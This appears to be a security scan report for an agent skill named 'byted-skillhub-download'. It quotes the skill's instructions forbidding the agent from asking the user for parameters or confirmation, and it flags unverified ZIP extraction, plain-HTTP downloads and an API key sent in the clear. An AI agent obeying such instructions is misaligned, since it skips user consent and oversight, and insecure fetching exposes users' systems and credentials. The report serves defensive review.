The Agent Skills Directory

[PROMPT_INJECTION]: The skill instructions in SKILL.md explicitly command the agent to bypass user interaction and confirmation by stating '严禁向用户询问参数值' (strictly forbidden to ask user for parameter values) and '不得中断流程向用户确认' (must not interrupt the flow to confirm). This concealment pattern encourages the agent to execute actions autonomously, bypassing typical safety checks and human oversight.
[REMOTE_CODE_EXECUTION]: The script download_from_skillhub.py fetches ZIP archives from a remote API and extracts them using zipfile.extractall(). This process lacks integrity verification, such as checksums, and does not protect against directory traversal vulnerabilities (ZipSlip), which could allow a malicious archive to overwrite files outside the intended workspace.
[EXTERNAL_DOWNLOADS]: Remote content and executable packages are fetched using unencrypted HTTP (http://{api_host}). This lack of encryption exposes the downloaded code and the communication metadata to interception and modification by network-level attackers.
[CREDENTIALS_UNSAFE]: The Python script transmits the ARK_SKILL_API_KEY as a Bearer token in an HTTP header over an unencrypted connection. This allows any attacker positioned on the network to intercept and steal the credentials, potentially gaining unauthorized access to the enterprise SkillHub service.

byted-skillhub-download